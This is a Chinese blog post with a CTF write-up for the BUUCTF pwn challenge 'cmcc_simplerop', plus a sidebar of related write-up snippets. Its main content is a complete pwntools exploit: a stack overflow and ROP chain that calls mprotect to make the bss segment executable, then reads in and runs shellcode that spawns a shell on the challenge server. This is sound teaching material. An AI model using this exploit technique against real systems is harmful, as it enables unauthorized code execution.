BUUCTF-PWN-cmcc_simplerop

最新推荐文章于 2023-09-24 23:38:35 发布
最新推荐文章于 2023-09-24 23:38:35 发布
阅读量476 收藏
点赞数
分类专栏: CTF PWN 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41743240/article/details/105808642
版权
CTF 同时被 2 个专栏收录
12 篇文章 0 订阅
订阅专栏
PWN
5 篇文章 0 订阅
订阅专栏

BUUCTF-cmcc_simplerop

开了NX

 

IDA反编译

程序非常简单,漏洞也一眼可见

程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode

exploit:

#coding:utf-8
from pwn import *

#p=process('simplerop')
p=remote('node3.buuoj.cn',29617)
elf=ELF('simplerop')


#0x0809de85 : pop ebp ; pop esi ; pop edi ; ret
payload='a'*32+p32(elf.symbols['mprotect'])+p32(0x0809de85)+p32(0x080EB000)+p32(0x1000)+p32(0x7)+p32(elf.symbols['read'])+p32(0x0809de85)+p32(0)+p32(0x080EBF80)+p32(0x100)+p32(0x080EBF80)
p.sendlineafter('nput :',payload)
sleep(0.2)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

执行效果

 

 

 

 

 

 

 

 

 

0kam1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CMCC--simplerop 题解
lifanxin的博客
03-28 1541
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 895
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
cmcc_simplerop解题过程
最新发布
weixin_55013445的博客
09-24 173
cmcc_simplerop解题流程
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 394
buuctf-pwn 001-016题wp
cmcc_simplerop
个人笔记
05-08 115
int80(11,“/bin/sh”,null,null),后面的四个参数分别是eax、ebx、ecx、edx。由于未开启PIE,我们利用simplerop中的read()函数写入bss段。2、ROPgadget找寄存器。偏移:0x14+4(错误)
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 362
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 957
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
BUUCTF之“cmcc_pwnme2”做题简单记录
Probeginner的博客
12-11 2625
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息。 from pwn import * p = remote('node4.buuoj.cn',25488) elf=ELF('./pwnme2') exec_string=0x080485cb string=0x0804a060 gets=elf.sym['gets'] p.recvuntil('Please input:\n') payload=b'a'*(0x6c+4)+p32(gets)+p32(.
buuctf pwn (inndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 240
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
cmcc Simplerop
Morphy_Amo的博客
03-17 3927
rop
buuctf[cmcc_pwnme1]题解
weixin_46521144的博客
03-26 298
拿到题目,发现getflag函数和简单栈溢出 高兴的尝试了一波,然而发现home目录下没有flag,倒是也正常,没有简单到这种程度 看一下保护 没有开,那也很简单,直接利用栈溢出,ret2libc即可 使用LibcSearcher直接搜索,这题就当是熟练手感了 from pwn import * from LibcSearcher import LibcSearcher context.log_level='debug' # io=process('./pwnme1') io=rem
2020数字中国虎符CTF-PWN-count writeup
qq_41743240的博客
04-19 2882
检查程序保护 在运行时可以发现,无法执行二进制文件: 可执行文件格式错误 但是程序可以进行IDA反编译 找到sub_400990函数 __int64 sub_400990() { unsigned int v0; // w0 __int64 v1; // x0 __int64 v2; // x0 __int64 v3; // x0 __int64 v4; // x0 _...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值